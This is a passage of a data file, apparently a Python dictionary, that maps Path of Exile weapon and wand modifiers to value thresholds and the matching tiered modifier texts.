"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(300, 'Adds (7 - 12) to (15 - 26) Chaos Damage'), (450, 'Adds (13 - 21) to (27 - 49) Chaos Damage'), (1000, 'Adds (22 - 43) to (50 - 74) Chaos Damage')],
"Adds # to # Cold Damage": [(120, 'Adds (5 - 8) to (11 - 18) Cold Damage'), (240, 'Adds (9 - 15) to (19 - 28) Cold Damage'), (300, 'Adds (16 - 22) to (29 - 39) Cold Damage'), (360, 'Adds (23 - 30) to (40 - 53) Cold Damage'), (1000, 'Adds (31 - 37) to (44 - 65) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(100, 'Adds (4 - 6) to (8 - 13) Cold Damage to Spells'), (180, 'Adds (7 - 11) to (14 - 20) Cold Damage to Spells'), (250, 'Adds (12 - 16) to (21 - 28) Cold Damage to Spells'), (280, 'Adds (17 - 21) to (28 - 38) Cold Damage to Spells'), (1000, 'Adds (22 - 26) to (31 - 46) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(150, 'Adds (7 - 12) to (13 - 21) Fire Damage'), (300, 'Adds (13 - 19) to (22 - 35) Fire Damage'), (375, 'Adds (20 - 27) to (36 - 48) Fire Damage'), (450, 'Adds (28 - 35) to (49 - 64) Fire Damage'), (1000, 'Adds (36 - 45) to (65 - 80) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(100, 'Adds (5 - 9) to (10 - 15) Fire Damage to Spells'), (200, 'Adds (10 - 14) to (16 - 25) Fire Damage to Spells'), (275, 'Adds (14 - 19) to (26 - 34) Fire Damage to Spells'), (320, 'Adds (20 - 25) to (35 - 45) Fire Damage to Spells'), (1000, 'Adds (26 - 32) to (46 - 56) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(200, 'Adds 1 to (25 - 40) Lightning Damage'), (400, 'Adds (1 - 3) to (41 - 65) Lightning Damage'), (550, 'Adds (2 - 5) to (66 - 82) Lightning Damage'), (650, 'Adds (2 - 7) to (83 - 106) Lightning Damage'), (1000, 'Adds (3 - 9) to (107 - 125) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(150, 'Adds 1 to (18 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 46) Lightning Damage to Spells'), (450, 'Adds (2 - 4) to (47 - 58) Lightning Damage to Spells'), (540, 'Adds (2 - 5) to (59 - 75) Lightning Damage to Spells'), (1000, 'Adds (3 - 7) to (75 - 88) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(50, 'Adds 1 to (2 - 3) Physical Damage'), (100, 'Adds (2 - 3) to (4 - 5) Physical Damage'), (150, 'Adds (4 - 5) to (6 - 7) Physical Damage'), (180, 'Adds (6 - 7) to (8 - 10) Physical Damage'), (500, 'Adds (8 - 9) to (11 - 13) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(25 - 28)% increased Chaos Damage'), (44, '(29 - 32)% increased Chaos Damage'), (100, '(33 - 36)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(21 - 26)% increased Elemental Damage'), (44, '(27 - 32)% increased Elemental Damage'), (100, '(33 - 38)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(5, 'You and Allies affected by your Aura Skills deal (13 - 16)% increased Damage'), (9, 'You and Allies affected by your Aura Skills deal (17 - 21)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (22 - 25)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(29 - 32)% increased Chaos Damage'), (22, '(33 - 36)% increased Chaos Damage'), (50, '(37 - 40)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(22, '(33 - 36)% increased Cold Damage'), (44, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(22, '(33 - 36)% increased Fire Damage'), (44, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(22, '(33 - 36)% increased Lightning Damage'), (44, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Cold Damage'), (70, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage\nGain (7 - 10)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Fire Damage'), (70, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage\nGain (7 - 10)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Lightning Damage'), (70, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage\nGain (7 - 10)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(10, '(25 - 28)% increased Chaos Damage'), (20, '(29 - 32)% increased Chaos Damage'), (50, '(33 - 36)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(35, '(27 - 32)% increased Global Physical Damage'), (70, '(33 - 38)% increased Global Physical Damage'), (100, '(39 - 44)% increased Global Physical Damage\nGain (7 - 10)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(22, '(29 - 35)% increased Attack Damage'), (44, '(36 - 44)% increased Attack Damage'), (100, '(45 - 51)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(22, '(29 - 35)% increased Spell Damage'), (44, '(36 - 44)% increased Spell Damage'), (100, '(45 - 51)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(25 - 28)% increased Chaos Damage'), (2, '(29 - 32)% increased Chaos Damage'), (10, '(33 - 36)% increased Chaos Damage')],
},
"Wand": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Ignite": [(20, '6% chance to Ignite'), (40, '7% chance to Ignite'), (200, '8% chance to Ignite\n(8 - 10)% increased Ignite Duration on Enemies')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Shock": [(20, '6% chance to Shock'), (40, '7% chance to Shock'), (200, '8% chance to Shock\n(8 - 10)% increased Shock Duration on Enemies')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed\n(5 - 6)% increased Cast Speed'), (50, '(3 - 4)% increased Attack Speed\n(7 - 9)% increased Cast Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(100, '(3 - 4)% increased Attack Speed')],
"#% increased Burning Damage": [(35, '(14 - 18)% increased Burning Damage'), (70, '(19 - 23)% increased Burning Damage'), (500, '(24 - 28)% increased Burning Damage\nIgnites you inflict deal Damage (15 - 20)% faster')],
"#% increased Cast Speed": [(40, '(5 - 6)% increased Cast Speed'), (65, '(7 - 9)% increased Cast Speed'), (200, '(10 - 12)% increased Cast Speed')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Mana Regeneration Rate": [(50, '(16 - 18)% increased Mana Regeneration Rate'), (90, '(19 - 21)% increased Mana Regeneration Rate'), (130, '(22 - 24)% increased Mana Regeneration Rate'), (170, '(25 - 27)% increased Mana Regeneration Rate'), (190, '(28 - 30)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n0.3% of Mana Regenerated per second')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Projectile Speed": [(40, '(9 - 10)% increased Projectile Speed'), (80, '(11 - 12)% increased Projectile Speed'), (115, '(13 - 14)% increased Projectile Speed'), (135, '(15 - 17)% increased Projectile Speed'), (200, '(18 - 20)% increased Projectile Speed\nProjectiles Pierce an additional Target')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(5 - 10)% chance to gain a Power Charge on Kill')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted\n(40 - 50)% increased Spell Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, 'Adds 1 to (5 - 6) Lightning Damage to Attacks with this Weapon per 10 Intelligence'), (200, '1% increased Spell Damage per 16 Intelligence')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Mana": [(70, '(8 - 10) to maximum Mana'), (125, '(11 - 14) to maximum Mana'), (175, '(15 - 19) to maximum Mana'), (230, '(20 - 24) to maximum Mana'), (280, '(25 - 30) to maximum Mana'), (500, '(6 - 8)% increased Attack Damage per 500 Maximum Mana\n(6 - 8)% increased Spell Damage per 500 Maximum Mana')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Damage over Time Multiplier": [(45, '(9 - 10) to Cold Damage over Time Multiplier'), (90, '(11 - 12) to Cold Damage over Time Multiplier'), (500, '(13 - 15) to Cold Damage over Time Multiplier')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Non-Ailment Chaos Damage over Time Multiplier": [(45, '(9 - 10) to Non-Ailment Chaos Damage over Time Multiplier'), (90, '(11 - 12) to Non-Ailment Chaos Damage over Time Multiplier'), (500, '(13 - 15) to Non-Ailment Chaos Damage over Time Multiplier')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Always Freezes Enemies on Hit": [(20, 'Always Freezes Enemies on Hit'), (40, 'Always Freezes Enemies on Hit'), (200, 'Always Freezes Enemies on Hit\n(8 - 10)% increased Freeze Duration on Enemies')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
